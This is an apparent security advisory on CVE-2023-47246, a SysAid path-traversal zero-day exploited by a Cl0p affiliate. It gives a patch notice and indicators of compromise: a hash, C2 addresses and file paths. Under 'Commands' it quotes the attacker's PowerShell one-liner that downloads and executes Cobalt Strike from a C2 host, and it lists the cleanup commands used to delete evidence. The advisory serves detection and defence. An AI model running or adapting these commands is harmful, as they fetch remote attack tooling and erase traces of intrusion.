SysAid zero-day flaw exploited by Cl0p hacker gang
Take action: If you are using SysAid IT support and management software download the patch and apply it ASAP. Such systems usually have an internet facing ticketing inteface which could be used as an attack vector. After patching, make a through review of the system for indicators of compromise. Be aggressive, don't wait for repeat of MOVEit.
Learn More
A critical zero-day vulnerability within the SysAid IT support and management software has been identified as being exploited by Lace Tempest - an affiliate of the Cl0p ransomware group. The recent attacks, described as limited, were detected by Microsoft's Threat Intelligence team and communicated to SysAid on November 2, 2023.
The vulnerability is tracked as CVE-2023-47246 (No CVSS score yet) and is a path traversal vulnerability, which allows attackers unauthorized system access and arbitrary code execution. The attackers exploited this by uploading a WAR archive containing a webshell to the SysAid Tomcat web service, enabling further malicious activities including deploying a malware loader and a trojan into various system processes, and then executing a second PowerShell script to erase evidence of the intrusion. SysAid, upon being notified, launched an incident response protocol and reached out to their on-premise customers with a mitigation solution.
SysAid has released a patch (v23.3.36) to address the vulnerability and is urging customers to update their systems. They have provided indicators of compromise for users to check for any unauthorized access or suspicious activities and to review logs for any unusual behavior that could indicate exploitation:
Hashes
| Filename | Sha256 | Comment |
| user.exe | b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d | Malicious loader |
IP Addresses
| IP | Comment |
| 81.19.138[.]52 | GraceWire Loader C2 |
| 45.182.189[.]100 | GraceWire Loader C2 |
| 179.60.150[.]34 | Cobalt Strike C2 |
| 45.155.37[.]105 | Meshagent remote admin tool C2 |
File Paths
| Path | Comment |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe | GraceWire |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war | Archive of WebShells and tools used by the attacker |
| C:\Program Files\SysAidServer\tomcat\webapps\leave | Used as a flag for the attacker scripts during execution |
Commands
The following command is used to download and execute CobaltStrike after initial access is established:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')
Post-Compromise Cleanup
After initial compromise, the attacker cleans up payloads used to establish an initial foothold on the infected servers, evidence of the following commands being run on SysAid servers indicates successful exploitation:
- Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
- Remove-Item -Force “$wapps\usersfiles.war”.
- Remove-Item -Force “$wapps\usersfiles\user.*”.
- & “$wapps\usersfiles\user.exe”.
Antivirus Detections
Microsoft Defender detects the components of this attack as the following threats:
- Trojan:Win32/TurtleLoader
- Backdoor:Win32/Clop
- Ransom:Win32/Clop
